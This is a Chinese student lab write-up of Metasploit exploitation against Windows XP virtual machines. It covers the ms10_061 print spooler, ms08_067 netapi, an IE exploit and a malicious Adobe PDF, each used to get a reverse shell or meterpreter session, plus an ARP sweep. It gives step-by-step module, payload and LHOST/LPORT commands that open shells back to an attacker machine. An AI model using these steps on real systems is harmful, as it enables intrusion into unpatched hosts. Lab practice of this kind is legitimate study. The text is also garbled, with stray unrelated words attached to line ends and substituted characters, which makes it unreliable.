这几个实验我发现就是在使用exploit攻击模块中不一样的攻击方法进行攻击,并且流程基本都同样。先使用search exploit/windows/smb/ms
找到windows中的漏洞,而后看看其简单的描述,选中其中一个使用info xxx
查看其信息,主要看其可攻击targets、描述、必须设置的参数。接下来设置payload,同时设置payload的参数,全部的参数都设置完毕以后就能够进行exploit攻击了!总的来讲就是在使用metaspolit这个软件提供的攻击服务!!shell
在完成老师安排的任务以外,我还尝试了:数据库
ms06_066_nwapi
只差一步可恶!windows
下面这个是成功的!!!api
use exploit/windows/smb/ms10_061_spoolss
进入攻击模块浏览器
info
查看
等级Excellent,发布时间2010-09-14安全
目标机器:全部的windows平台网络
须要设置参数:目标地址和端口,可选:目标共享打印机名
描述:打印机漏洞session
被进攻的机器为Windows xp中文版
其中xp中要有共享打印机,具体作法tcp
一、在控制面板中的---打印机和传真---下有默认的Microsoft打印机,但好像并很差用(能够尝试下直接改属性---端口为COM1试试)。 二、VMware提供虚拟打印机,在com1口。 三、删掉了默认的打印机(自愿),而后,添加打印机---链接到次计算机的本地打印机(去掉勾选的自动检测)---COM1口(VMware中查看便可)---打印机厂商默认便可---打印机名---共享---位置随意可不填 四、重启print Spooler服务(不重启可能致使meta链接打印机失败)
回到Linux中,设置相关参数后(要注意:set PNAME 为目标打印机name),exploit攻击成功!
测试
要攻击一个有漏洞的主机简直不过太简单了!!!我感受修复一个漏洞所须要的时间尚未使用这个漏洞拿来攻击所花费的时间长!!之后有补丁真的立刻安装,我不再敢拖了。真的惧怕!
输入命令use exploit/windows/smb/ms08_067_netapi,info
了解该漏洞模块的使用。
windows平台,等级great,补丁发布时间2008-10-28
可攻击的目标:windows 2003
须要设置的参数目标地址(RHOST)、目标端口(RPORT)、使用管道(SMBPIPE)
描述如上
输入命令show payloads
会显示出有效的攻击载荷,以下图所示,咱们找到一个shell_reverse_tcp。
使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
根据show options
中必须设置的东西进行设置
输入命令exploit开始攻击,垂手可得的正常攻击成功
中途我对老师给的中文版的windows xp进行攻击,觉得成功了,没想到看了同窗的博客发现是白开心一场
同上述步骤,第一步,查找相关漏洞信息
平台winodows,等级Normal,补丁发布时间2011-06-16
可攻击的目标:XP或Vista的IE7和IE8
必须的参数:反弹地址(SRVHOST)、反弹端口(SRVPORT)
描述
使用show payloads
指令查看可使用的负载
加载payload
set payload windows/meterpreter/reverese_http
设置相应参数,经过show options查看
set URIPATH ms5320 //设置访问主页的URI set LHOST 192.168.47.130 //设置攻击IP set LPORT 8888 //设置攻击端口
打开服务exploit,发起渗透攻击
此时,在靶机中启动IE 7浏览器,访问连接:http://192.168.47.130:8080/ms5320;
与此同时,在攻击机的MSF终端中,能够看到以下信息:
输入sessions
能够看见正在监听端的活动会话
发现1端口正在监听,使用session -i 1
接入ID号为1的当前靶机回连的会话
攻击成功!
这个渗透攻击模块的路径为windows/fileformat/adobe_cooltype_sing
,使用info
查看该模块的内容
能够看到这个漏洞是存在于8.2.4和9.3.4版本的Adobe Reader中,于2010-09-07发布的补丁,等级是Great。
咱们进入该模块设定相关系数并生成相关文件5320.pdf
将生成的pdf文件导入到windows XP Attacker靶机中运行,回连成功!
这个这个pdf的内容,内容并不可疑!
先手动建立一个msf所需的数据库
输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
show options查看须要设置的消息,其中rhosts填写本身电脑所在网段
设置必要参数
set RHOSTS 172.30.1.0/21
set threads 2
命令run开启扫描,结果能够看到除了本身主机的IP,还有其余ip